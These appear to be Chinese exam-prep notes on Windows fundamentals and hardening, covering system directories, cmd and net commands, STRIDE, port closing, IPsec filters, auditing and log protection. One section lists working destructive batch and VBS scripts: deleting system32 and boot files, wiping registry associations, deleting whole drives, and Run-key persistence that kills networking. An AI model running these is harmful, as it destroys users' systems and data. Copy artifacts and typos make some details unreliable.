第一次 周考

Windows 发展史

Windows 3.0 1990年 出现图形化界面
Windows 95 1995年 第一个不用安装 MS-DOS 的系统
Windows NT 1996年 出现服务器版本
Windows XP 2001年 个人计算机的里程碑
Windows 7 2009年 推出简易版、家庭版、专业版、企业版、普通版多个版本
Windows server 2012 R2 目前企业服务器版本中使用最多的一种

系统目录

user目录是用户配置文件，不包括用户安装的软件
program files 和program files（x86）是一样的，只不过（x86）是用来安装32位软件的
Windows是系统目录，包括system、system32、addins等
磁盘主要文件目录 intel、perflogs、program files 和program files（x86）、user、Windows-----程序、应用程序、用户、系统
documents and setings/用户
桌面、开始菜单、application data：通用应用程序文件夹、favorites：收藏夹、local setting：保存应用临时数据、历史和临时文件，可清理
my documents:我的文档
program files 常见文件夹
common files：公用程序文件夹，比如微软，Adobe等软件
complus application 微软com+组件使用的文件夹，删除后com+组件可能无法使用
difx:高效的xml索引方法，不可删除
Xerox：用作自带的一些图形处理软件的临时空间
program data
目录位程序数据目录，是隐藏的

注册表
注册表自启动项HKCU、HKLM中存在，且run的上一级为currentversion

服务的生命周期
状态：start、stop、running、–pending
服务的生命周期没有sleep状态，服务得一直运行，持续运行且不可见的应用，可以通过net start+服务名来启动服务。

线程进程
线程-进程-程序
同一进程中的线程共同享有资源，不同进程中的线程相互之间是隔离的，

Windows常用命令
win + r
cmd 进入系统
regedit 注册表
services.msc 系统服务
calc 计算器
mstsc 远程桌面
gpedit.msc 组策略

win+r+cmd
ping
ping ip -t ping指定的主机直到停止，结束Ctrl+c
ping ip -n count 指定ping几条，默认4条
ipconfig 查看主机IP配置
net
net start/stop+ 服务名 开启关闭服务 如mysql
net user + 用户名 查看用户状态
net user 用户名 密码/add 添加用户默认为user组
net user 用户名 密码/del 删除用户
net user 用户名 /activity: yes/no 激活/禁用 用户
net localgroup /add 提权
映射对磁盘到本地盘，得是本地不存在的磁盘eg h
文件命令
dir 列出当前目录下的子目录
cls 清屏
cd 进入指定目录
copy
diskcopy 复制磁盘
del
format 格式化磁盘
md 建立子目录
move
more 分屏显示内容
rd 删除目录
tree 列出目录树

STRIDE

1. Spoofing 就是伪装，比如我用别人的ID发言就是Identity Spoofing, 我想到用变化IP的办法就是IP Spoofing.

2. Tampering 就是篡改，比如我用别人ID发言的手段就是篡改了合法包，而他们的server端没有相应的检查措施。

3. Repudiation 就是拒绝承认，比如我进行了这些攻击，他们并不知道是我做的，也没有证据是我做的，我就可以不承认。

4. Information Disclosure 就是信息的泄漏，比如他们的那串数字图片就没有任何保护，图片上的信息轻易的就被别人得到了。

5. Denial of Services 就是拒绝服务，比如我的自动发帖使得正常用户无法使用就是这种攻击。

6. Elevation of Privileges 就是权限的提升，比如我尝试用管理员的权限去做事情，就是属于这种。

保护数据安全
应用层、物理层、网络层、操作系统。CIA：安全三元–机密性、完整性、可用性。

为保证系统安全，应该优化和关注注册表的哪些方面
1.影子用户啊
2.用户登录自启动
3.开机自启动
4.IE浏览器是否被篡改
5.映像劫持
6.修改文件关联
HKEY_CLASSES_ROOT\textfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\textfile\shell\open\command
7.设置对注册表工具(Regedit.exe)的运行限制
8.设置对注册表键的访问权限
9.安全设置控制对注册表的远程访问Windows的注册表不仅可本地访问还可远程访问。
10.部署审核监视用户对注册表的操作

高危操作命令
1 蓝屏死机

Del %windowsdrive%*.* /f /s /q Shutdown -s -f -t 0
2 更改文件后缀名

Ren *.doc *.txt Ren *.jpeg *.txt Ren *.lnk *.txt Ren *.avi *.txt Ren *.mpeg *.txt Ren * *.txt Ren *.bat *.txt
3 删除system32

Del c:\windows\system32*.* /q
4 使PC永久崩溃

@echo off Attrib -r -s -h c:\autoexec.bat Del c:\autoexec.bat Attrib -r -s -h c:\boot.ini Del c:\boot.ini Attrib -r -s -h c:\ntldr Del c:\ ntldr Attrib -r -s -h c:\windows\win.ini Del c:\windows\win.ini
5 删除所有的注册表

@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*
6 永久禁用网络

echo @echo off>c:\windows\wimn32.bat echo break off>>c:\windows\wimn32.bat echo ipconfig/release_all>>c:\windowswimn32.bat echo end>>c:\windows\wimn32.bat reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVision\Run /v CONTROLexit /t reg_sz /d c:/Windows/wimn32.bat /f Pause
7 一直按回车

(这个要保存为.vbs) Set wshShell=wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys"~(enter)" loop
8 启动电脑后自动关机

echo @echo off>c:\Windows\hartlell.bat echo break off>>c:\Windows\hartlell.bat echo shutdown -r -t 11 -f>>c:\Windows\hartlell.bat echo end>>c:\Windows\hartlell.bat reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windwos\CurrentVersion\Run /v startAPI /t reg_sz /d c:\Windows\hartlell.bat /f reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v /t reg_sz /d c:\Windows\hartlell.bat /f pause
9 开启CD蜂鸣器

(这个也是.vbs格式) Set oWMP=CreateObject(“WMPlayer.OCX.7”) Set colCDROMs=oWMP.cdromCollection do if colCDROMs.Count>=1 then For i=0 to colCDROMs.Count -1 colCDROMs.Item(i).Eject Next For i=0 to colCDROMs.Count -1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop 10. rd/s/q D:\ rd/s/q C:\ rd/s/q E:\

新的操作系统怎么设置其安全

一、安装过程

网络连接

在安装完成Windows
2000操作系统后，不要立即连入网络，因为这时系统上的各种程序还没有打上补丁，存在各种漏洞，非常容易感染病毒和被入侵，此时应该安装杀毒软件和[URL=http://www.bingdun]防火墙[/URL]。杀毒软件和[URL=http://www.bingdun]防火墙[/URL]推荐使用诺顿企业版客户端（若做服务器则用服务端）和黑冰（Blackice）[URL=http://www.bingdun]防火墙[/URL]。接着，再把下面的事情做完后再上网。

二、正确设置和管理账户

1、停止使用Guest账户，并给Guest加一个复杂的密码。所谓的复杂密码就是密码含大小写字母、数字、特殊字符（～！@#￥％《》，。？）等。比如象：“G7Y3，^）y。
2、账户要尽可能少，并且要经常用一些扫描工具查看一下系统账户、账户权限及密码。删除停用的账户，常用的扫描软件有：流光、HSCAN、X－SCAN、STAT　SCANNER等。正确配置账户的权限，密码至少应不少于8位，比如：“3H.#4d&j1)~w”,呵呵……让他破吧！！这样的密码他可能把机子跑烂也跑不出来哦_
3、增加登录的难度，在“账户策略→密码策略”中设定：“密码复杂性要求启用”，“密码长度最小值8位”，“强制密码历史5次”，“最长存留期
30天”；在“账户策略→账户锁定策略”设定：“账户锁定3次错误登录”，“锁定时间30分钟”，“复位锁定计数30分钟”等，增加了登录的难度对系统的安全大有好处。
4、把系统Administrator账号改名，名称不要带有Admin等字样;
创建一个陷阱帐号，如创建一个名为“Administrator”的本地帐户，把权限设置成最低，什么事也干不了，并且加上一个超过10位的超级复杂密码。这样可以让那些“不法之徒”忙上一段时间了，并且可以借此发现他们的入侵企图。

三、网络服务安全管理

1、关闭不需要的服务
只留必需的服务，多一些服务可能会给系统带来更多的安全因素。如Windows 2000的Terminal
Services（终端服务）、IIS（web服务）、RAS（远程访问服务）等，这些都有产生漏洞的可能。
2、关闭不用的端口。
3、只开放服务需要的端口与协议。
具体方法为：按顺序打开“网上邻居→属性→本地连接→属性→Internet
协议→属性→高级→选项→TCP/IP筛选→属性”，添加需要的TCP、UDP端口以及IP协议即可。根据服务开设口，常用的TCP口有：80口用于Web服务；21用于FTP服务；25口用于SMTP；23口用于Telnet服务；110口用于POP3。常用的UDP端口有：53口－DNS域名解析服务；161口－snmp简单的网络管理协议。8000、4000用于OICQ，服务器用8000来接收信息，客户端用4000发送信息。如果没有上面这些服务就没有必要打开这些端口。
4、禁止建立空连接
Windows2000的默认安装允许任何用户可通过空连接连上服务器，枚举账号并猜测密码。空连接用的端口是139，通过空连接，可以复制文件到远端服务器，计划执行一个任务，这就是一个漏洞。可以通过以下两种方法禁止建立空连接：
（1）
修改注册表中Local_Machine/System/CurrentControlSet/Control/LSA-RestrictAnonymous
的值为1。
（2）修改Windows
2000的本地安全策略。设置“本地安全策略→本地策略→选项”中的RestrictAnonymous（匿名连接的额外限制）为“不容许枚举SAM账号和共享”。
Windows2000的默认安装允许任何用户通过空连接得到系统所有账号和共享列表，这本来是为了方便局域网用户共享资源和文件的，但是，同时任何一个远程用户也可以通过同样的方法得到您的用户列表，并可能使用暴力法破解用户密码给整个网络带来破坏。很多人都只知道更改注册表Local_Machine/System/CurrentControlSet/Control/LSA-RestrictAnonymous
= 1来禁止空用户连接，实际上Windows
2000的本地安全策略里（如果是域服务器就是在域服务器安全和域安全策略里）就有RestrictAnonymous选项，其中有三个值：“0”这个值是系统默认的，没有任何限制，远程用户可以知道您机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum)等；“1”这个值是只允许非NULL用户存取SAM账号信息和共享信息；“2”这个值只有Windows
2000才支持，需要注意的是，如果使用了这个值，就不能再共享资源了，所以还是推荐把数值设为“1”比较好。

四、关闭无用端口和修改3389端口

Windows的每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中这些服务都是默认开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭了无用的服务。
关闭这些无用的服务可以通过“控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口：关闭Simple
TCP/IP Service,支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及
Quote of the Day。
2、关闭80口：关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing
Service"，通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口：关闭Simple Mail Transport
Protocol (SMTP)服务，它提供的功能是跨网传送电子邮件。
4、关掉21端口：关闭FTP Publishing
Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP
连接和管理。
5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务，此服务提供
RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc[URL=http://hackbase/News/vip/#]KaTeX parse error: Expected 'EOF', got '#' at position 43: …e/News/vip/#̲][/URL]、admin[URL=http://hackbase/News/vip/#]$[/URL]等等，此服务关闭不影响您的共他操作。
7、还有一个就是139端口，139端口是NetBIOS　Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。
关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。
对于个人用户来说，可以在以上各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动后端口再次打开。现在你不用担心你的端口和默认共享了。
8、修改3389
打开注册表HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal
Server/Wds/Repwd/Tds/Tcp,
看到那个PortNumber没有?0xd3d，这个是16进制，就是3389啦。我改XXXX这个值是RDP(远程桌面协议)的默认值，也就是说用来配置以后新建的RDP服务的，要改已经建立的RDP服务，我们去下一个键值：HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/TerminalServer/WinStations这里应该有一个或多个类似RDP-TCP的子健（取决于你建立了多少个RDP服务），一样改掉PortNumber。

五、本地安全策略

A、通过建立IP策略来阻止端口连接

TCP端口:21(FTP,换FTP端口)23(TELNET),53(DNS),135,136,137,138,139,443,445,1028,1433,3389

TCP端口:1080,3128,6588,8080(以上为代理端口).25(SMTP),161(SNMP),67(引导)

UDP端口:1434(这个就不用说了吧)
阻止所有ICMP,即阻止PING命令
B、在这里我用关闭135端口来实例讲解
1.创建IP筛选器和筛选器操作
a.“开始”->“程序”->“管理工具”->“本地安全策略”.微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的.
b.右击"Ip安全策略,在本地机器",选择"管理 IP 筛选器表和筛选器操作",启动管理 IP
筛选器表和筛选器操作对话框.我们要先创建一个IP筛选器和相关操作才能够建立一个相应的IPsec安全策略.
c.在"管理 IP 筛选器表"中,按"添加"按钮建立新的IP筛选器:
1)在跳出的IP筛选器列表对话框内,填上合适的名称,我们这儿使用"tcp135",描述随便填写.单击右侧的"添加…“按钮,启动IP筛选器向导.
2)跳过欢迎对话框,下一步.
3)在IP通信源页面,源地方选"任何IP地址”,因为我们要阻止传入的访问.下一步.
4)在IP通信目标页面,目标地址选"我的IP地址".下一步.
5)在IP协议类型页面,选择"TCP".下一步.
6)在IP协议端口页面,选择"到此端口"并设置为"135",其它不变.下一步.
7)完成.关闭IP筛选器列表对话框.会发现tcp135IP筛选器出现在IP筛选器列表中.
d.选择"管理筛选器操作"标签,创建一个拒绝操作:
1)单击"添加"按钮,启动"筛选器操作向导",跳过欢迎页面,下一步.
2)在筛选器操作名称页面,填写名称,这儿填写"拒绝".下一步.
3)在筛选器操作常规选项页面,将行为设置为"阻止".下一步.
4)完成.
e、关闭"管理 IP 筛选器表和筛选器操作"对话框.
2.创建IP安全策略
1.右击"Ip安全策略,在本地机器",选择"创建IP安全策略",启动IP安全策略向导.跳过欢迎页面,下一步.
2.在IP安全策略名称页面,填写合适的IP安全策略名称,这儿我们可以填写"拒绝对tcp135端口的访问",描述可以随便填写.下一步.
3.在安全通信要求页面,不选择"激活默认响应规则".下一步.
4.在完成页面,选择"编辑属性".完成.
5.在"拒绝对tcp135端口的访问属性"对话框中进行设置.首先设置规则:
1)单击下面的"添加…“按钮,启动安全规则向导.跳过欢迎页面,下一步.
2)在隧道终结点页面,选择默认的"此规则不指定隧道”.下一步.
3)在网络类型页面,选择默认的"所有网络连接".下一步.
4)在身份验证方法页面,选择默认的"windows 2000默认值(Kerberos V5 协议)".下一步.
5)在IP筛选器列表页面选择我们刚才建立的"tcp135"筛选器.下一步.
6)在筛选器操作页面,选择我们刚才建立的"拒绝"操作.下一步.
7)在完成页面,不选择"编辑属性",确定.
6.关闭"拒绝对tcp135端口的访问属性"对话框.
3.指派和应用IPsec安全策略
1）缺省情况下,任何IPsec安全策略都未被指派.首先我们要对新建立的安全策略进行指派.在本地安全策略MMC中,右击我们刚刚建立的"“拒绝对tcp135端口的访问属性"安全策略,选择"指派”.
2）立即刷新组策略.使用"secedit /refreshpolicy
machine_policy"命令可立即刷新组策略.

六、审核策略

具体方法：控制面板==》管理工具==》本地安全策略==》本地策略==》审核策略，然后右键点击下列各项，选择“安全性”来设置就可以了。
审核策略更改:成功,失败
审核登录事件:成功,失败
审核对象访问:失败
审核对象追踪:成功,失败
审核目录服务访问:失败
审核特权使用:失败
审核系统事件:成功,失败
审核账户登录事件:成功,失败
审核账户管理:成功,失败
密码策略:启用“密码必须符合复杂性要求","密码长度最小值"为6个字符,"强制密码历史"为5次,"密码最长存留期"为30天.
在账户锁定策略中设置:"复位账户锁定计数器"为30分钟之后,"账户锁定时间"为30分钟,“账户锁定值"为30分钟.
安全选项设置:本地安全策略本地策略安全选项==对匿名连接的额外限制,双击对其中有效策略进行设置,选择"不允许枚举SAM账号和共享”,因为这个值是只允许非NULL用户存取SAM账号信息和共享信息,一般选择此项，然后再禁止登录屏幕上显示上次登录的用户名。
禁止登录屏幕上显示上次登录的用户名也可以改注册表HKEY_LOCAL_MACHINE/SOFTTWARE/Microsoft/WindowsNT/CurrentVesion/Winlogn项中的Don’t
Display Last User
Name串，将其数据修改为1

七、Windows日志文件的保护

日志文件对我们如此重要，因此不能忽视对它的保护，防止发生某些“不法之徒”将日志文件清洗一空的情况。
1．
修改日志文件存放目录
　　Windows日志文件默认路径是“%systemroot%/system32/config”，我们可以通过修改注册表来改变它的存储目录，来增强对日志的保护。
　　点击“开始→运行”，在对话框中输入“Regedit”，回车后弹出注册表编辑器，依次展开“HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog”后，下面的Application、Security、System几个子项分别对应应用程序日志、安全日志、系统日志。
　　我以应用程序日志为例，将其转移到“d:abc”目录下。首先选中Application子项，在右栏中找到File键，其键值为应用程序日志文件的路径“%SystemRoot%system32configAppEvent.Evt”，将它修改为“d:abc/AppEvent.Evt”。接着在D盘新建“abc”目录，将“AppEvent.Evt”拷贝到该目录下，重新启动系统，这样就完成了应用程序日志文件存放目录的修改。其它类型日志文件路径修改方法相同，只是在不同的子项下操作。
　　2．
设置文件访问权限
　　修改了日志文件的存放目录后，日志还是可以被清空的，下面通过修改日志文件访问权限，防止这种事情发生，前提是Windows系统要采用NTFS文件系统格式。
　　右键点击D盘的CCE目录，选择“属性”，切换到“安全”标签页后，首先取消“允许将来自父系的可继承权限传播给该对象”选项勾选。接着在账号列表框中选中“Everyone”账号，只给它赋予“读取”权限；然后点击“添加”按钮，将“System”账号添加到账号列表框中，赋予除“完全控制”和“修改”以外的所有权限，最后点击“确定”按钮。这样当用户清除Windows日志时，就会弹出错误对话框